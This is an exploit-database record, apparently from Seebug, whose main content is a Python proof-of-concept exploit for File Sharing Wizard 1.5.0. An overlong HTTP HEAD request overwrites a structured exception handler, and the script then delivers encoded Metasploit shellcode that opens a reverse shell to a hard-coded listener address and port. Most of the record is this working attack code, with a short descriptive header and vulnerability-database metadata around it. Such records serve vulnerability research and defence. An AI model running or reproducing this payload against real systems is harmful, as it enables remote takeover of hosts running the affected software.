Description
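No description provided by source. Going by the comments in the embedded proof-of-concept, this record covers File Sharing Wizard 1.5.0 (build of 26-8-2008): an overlong request sent with the HTTP HEAD method overwrites a structured exception handler (SEH) record, which the author reports leads to remote code execution. The author tested it on Windows XP SP2. The record lists no CVE. Its CVSS score of 0.0 with vector "NONE" appears to mean the entry was never scored, not that the issue is low severity. The embedded payload is a reverse shell to a hard-coded address and port, and the author's own comment says not to trust the shellcode.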
{"sourceData": "\n #!/usr/bin/python\r\n \r\n \r\nprint "\\n##########################################################"\r\nprint "## Team Hackers Garage ##"\r\nprint "## (www.garage4hackers.com) ##"\r\nprint "## ##"\r\nprint "## File Sharing Wizard Version 1.5.0 ##"\r\nprint "## Remote Command Execution ##"\r\nprint "## Author: b0nd ##"\r\nprint "## (sumit.iips@gmail.com) ##"\r\nprint "## ##"\r\nprint "## Greetz to: The Hackers Garage Family ##"\r\nprint "## Thanks to: www.exploit-db.com/author/m1k3/ ##"\r\nprint "## ##"\r\nprint "## & ##"\r\nprint "## ##"\r\nprint "## Peter Van (CORELAN TEAM) ##"\r\nprint "## ##"\r\nprint "###########################################################"\r\n \r\n \r\n# http://www.sharing-file.net/\r\n# File Sharing Wizard Version 1.5.0 build on 26-8-2008\r\n \r\n# Summary: The "HEAD" command leads to SEH overwrite and ultimately remote system compromise\r\n# Tested on: Windows XP SP2\r\n# SEH Overwrite and shellcode pointed out by EBP\r\n# Huge space for shellcode.\r\n \r\n \r\nimport socket\r\nimport sys\r\n \r\nif len(sys.argv) < 2:\r\n print "Usage: exploit-code.py <Remote-IP-Address> <Remote-Port>"\r\n sys.exit(1)\r\n \r\nips = sys.argv[1]\r\nport = int(sys.argv[2])\r\n \r\n \r\nstring = "A"*1040\r\nstring += "\\x90\\x90\\x1d\\xeb" # nSEH --> Jump to Shellcode\r\nstring += "\\x29\\xE3\\xD3\\x74" # pop pop ret from oledlg.dll (SafeSEH OFF)\r\nstring += "\\x90"*16 # Nop's\r\n \r\n#win32_reverse - EXITFUNC=seh LHOST=192.168.96.1 LPORT=55555 Size=649 Encoder=PexAlphaNum http://metasploit.com */\r\n#Thumb rule - Don't trust the shellcode ;)\r\nstring += ("\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49" +\r\n"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36" +\r\n"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34" +\r\n"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41" 
+\r\n"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x56\\x4b\\x4e" +\r\n"\\x4d\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x36\\x4b\\x38" +\r\n"\\x4e\\x56\\x46\\x42\\x46\\x32\\x4b\\x48\\x45\\x44\\x4e\\x43\\x4b\\x38\\x4e\\x47" +\r\n"\\x45\\x30\\x4a\\x37\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x31\\x4b\\x48" +\r\n"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x38\\x46\\x53\\x4b\\x38" +\r\n"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x38\\x42\\x4c" +\r\n"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e" +\r\n"\\x46\\x4f\\x4b\\x53\\x46\\x45\\x46\\x42\\x4a\\x32\\x45\\x47\\x45\\x4e\\x4b\\x38" +\r\n"\\x4f\\x35\\x46\\x32\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x50\\x4b\\x34" +\r\n"\\x4b\\x58\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\\x4e\\x32\\x4b\\x48" +\r\n"\\x49\\x48\\x4e\\x56\\x46\\x42\\x4e\\x31\\x41\\x36\\x43\\x4c\\x41\\x53\\x4b\\x4d" +\r\n"\\x46\\x46\\x4b\\x58\\x43\\x54\\x42\\x53\\x4b\\x48\\x42\\x54\\x4e\\x50\\x4b\\x48" +\r\n"\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x38\\x42\\x54\\x4a\\x30\\x50\\x55\\x4a\\x36" +\r\n"\\x50\\x58\\x50\\x54\\x50\\x50\\x4e\\x4e\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x48\\x36" +\r\n"\\x43\\x45\\x48\\x36\\x4a\\x36\\x43\\x43\\x44\\x53\\x4a\\x36\\x47\\x57\\x43\\x57" +\r\n"\\x44\\x53\\x4f\\x35\\x46\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e" +\r\n"\\x4e\\x4f\\x4b\\x43\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x4f\\x45\\x49\\x58\\x45\\x4e" +\r\n"\\x48\\x56\\x41\\x38\\x4d\\x4e\\x4a\\x30\\x44\\x30\\x45\\x55\\x4c\\x36\\x44\\x50" +\r\n"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x55" +\r\n"\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x43\\x55\\x43\\x55\\x43\\x55\\x43\\x44\\x43\\x55" +\r\n"\\x43\\x44\\x43\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x42\\x4c\\x4a\\x4a\\x42\\x56" +\r\n"\\x41\\x50\\x48\\x56\\x4a\\x36\\x49\\x4d\\x43\\x50\\x48\\x36\\x43\\x45\\x49\\x38" 
+\r\n"\\x41\\x4e\\x45\\x59\\x4a\\x46\\x4e\\x4e\\x49\\x4f\\x4c\\x4a\\x42\\x56\\x47\\x35" +\r\n"\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x42\\x41\\x41\\x55\\x45\\x35\\x4f\\x4f\\x42\\x4d" +\r\n"\\x48\\x56\\x4c\\x46\\x46\\x36\\x48\\x36\\x4a\\x46\\x43\\x36\\x4d\\x56\\x4c\\x46" +\r\n"\\x42\\x55\\x49\\x35\\x49\\x52\\x4e\\x4c\\x49\\x58\\x47\\x4e\\x4c\\x36\\x46\\x54" +\r\n"\\x49\\x58\\x44\\x4e\\x41\\x33\\x42\\x4c\\x43\\x4f\\x4c\\x4a\\x45\\x39\\x49\\x48" +\r\n"\\x4d\\x4f\\x50\\x4f\\x44\\x44\\x4d\\x42\\x50\\x4f\\x44\\x44\\x4e\\x52\\x4d\\x48" +\r\n"\\x4c\\x47\\x4a\\x33\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x36\\x44\\x57\\x50\\x4f" +\r\n"\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x57\\x4a\\x42\\x4f\\x4f\\x48\\x4d\\x4b\\x55" +\r\n"\\x47\\x45\\x44\\x35\\x41\\x55\\x41\\x55\\x41\\x35\\x4c\\x46\\x41\\x30\\x41\\x45" +\r\n"\\x41\\x35\\x45\\x35\\x41\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4d\\x4a\\x49\\x4d" +\r\n"\\x45\\x50\\x50\\x4c\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x4f\\x4f\\x4f\\x4f" +\r\n"\\x47\\x53\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x47\\x4e\\x49\\x57\\x48\\x4c\\x49\\x47" +\r\n"\\x4f\\x4f\\x45\\x57\\x46\\x50\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x47\\x47\\x4e\\x4f" +\r\n"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x35\\x43\\x45" +\r\n"\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x42\\x4d\\x5a");\r\n \r\nstring += "D"*4000 # Some more junk\r\n \r\nprint "Launching remote BoF on", ips\r\nprint ""\r\n \r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\ntry:\r\n connect=s.connect((ips, port))\r\nexcept:\r\n print "no connection possible"\r\n sys.exit(1)\r\n \r\nprint "\\r\\nsending payload"\r\nprint "..."\r\n \r\npayload = (\r\n'HEAD %s HTTP/1.0\\r\\n'\r\n'\\r\\n') % (string)\r\n \r\n \r\ns.send(payload)\r\ns.close()\r\n \r\nprint "Check your netcat listening on TCP port 55555 for reverse connect shell\\n"\r\nprint "%s pwned!" 
% (ips)\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19813", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-19813", "type": "seebug", "viewCount": 25, "references": [], "lastseen": "2017-11-19T18:11:31", "published": "2010-06-18T00:00:00", "cvelist": [], "id": "SSV:19813", "enchantments_done": [], "modified": "2010-06-18T00:00:00", "title": "File Sharing Wizard Version 1.5.0 (SEH) Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645292052}}
{}